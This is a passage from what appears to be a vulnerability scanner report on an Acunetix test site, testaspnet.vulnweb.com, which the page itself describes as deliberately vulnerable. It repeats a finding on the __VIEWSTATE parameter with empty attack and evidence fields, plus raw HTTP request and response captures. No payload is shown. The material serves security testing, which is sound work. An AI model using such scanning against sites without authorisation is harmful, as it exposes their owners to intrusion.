href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8433&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAcm2wBNsIZGRk92HWYgE0zB6j99VHj6I%2FtPSiu60%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK82%2B%2FTBQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBW6xXt6QDb1X2eUHc6Rr6csqR8QG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:09 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAcm2wBNsIZGRk92HWYgE0zB6j99VHj6I/tPSiu60=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK82+/TBQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBW6xXt6QDb1X2eUHc6Rr6csqR8QG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:White" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8449&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAADhRDEdsIZGRkfL7KKg0OQytO7Z9ARAIeCNp1hCg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfs%2FPuBgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBWUBjFU%2FsY4JXRSik2zQkrnJzqzR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:29 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAADhRDEdsIZGRkfL7KKg0OQytO7Z9ARAIeCNp1hCg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfs/PuBgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBWUBjFU/sY4JXRSik2zQkrnJzqzR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:White" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 